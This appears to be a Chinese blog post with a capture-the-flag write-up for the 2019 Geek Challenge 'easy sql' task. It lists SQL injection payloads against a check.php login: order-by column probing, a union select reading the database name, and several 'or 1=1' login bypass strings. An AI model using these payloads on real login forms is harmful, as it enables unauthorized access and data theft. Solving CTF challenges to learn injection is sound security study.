极客大挑战2019——easy sql(两种方法)

Single

极客大挑战2019——easy sql(两种方法)

Post on 2022-08-16 433 0

1.常规方法

payload：?username=admin&password=1
payload：?username=admin&password=6-5 //判断页面是否相同

payload：?username=admin&password=1' order by 3%23
payload：?username=admin&password=1' order by 4%23

构造注入语句
payload：?username=admin&password=1' union select 1,2,database()%23

2.万能密码

admin' or '1'='1

payload:  ?username=admin' or '1'='1&password=123456789' or '1'='1 

或者 

?username=admin' or '1'='1&password=admin' or '1'='1' %23 
http://xxx.cn:81/check.php?username=admin' or '1'='1&password=admin' or '1'='1' %23 

?username=username=admin' or '1'='1&password=admin' or '1'='1 
http://xxx:81/check.php?username=username=admin' or '1'='1&password=admin' or '1'='1 

?username=username=admin' or '1'='1&password=admin' or '1'='1' %23 
http://xxx.cn:81/check.php?username=use&password=admin' or '1'='1' %23


?username=use&password=admin' or '1'='1' %23
http://xxx.cn:81/check.php?username=use&password=admin' or '1'='1' %23

暂无评论

发表评论取消回复

表情

/* logo扫光 */ .navbar-brand headerlogo{position:relative;overflow:hidden;margin: 0px 0 0 0px;}.headerlogo navbar-brand:before{content:""; position: absolute; left: -665px; top: -460px; width: 200px; height: 15px; background-color: rgba(255,255,255,.5); -webkit-transform: rotate(-45deg); -moz-transform: rotate(-45deg); -ms-transform: rotate(-45deg); -o-transform: rotate(-45deg); transform: rotate(-45deg); -webkit-animation: searchLights 6s ease-in 0s infinite; -o-animation: searchLights 6s ease-in 0s infinite; animation: searchLights 5s ease-in 0s infinite;}@-moz-keyframes searchLights{50%{left: -100px; top: 0;} 65%{left: 120px; top: 100px;}}@keyframes searchLights{40%{left: -100px; top: 0;} 60%{left: 120px; top: 100px;} 80%{left: -100px; top: 0px;}} //文本复制监听，右上弹窗提示 .toast-top-right { top: 72px; right: 12px; } .toast-success { background-color: #7486E7; }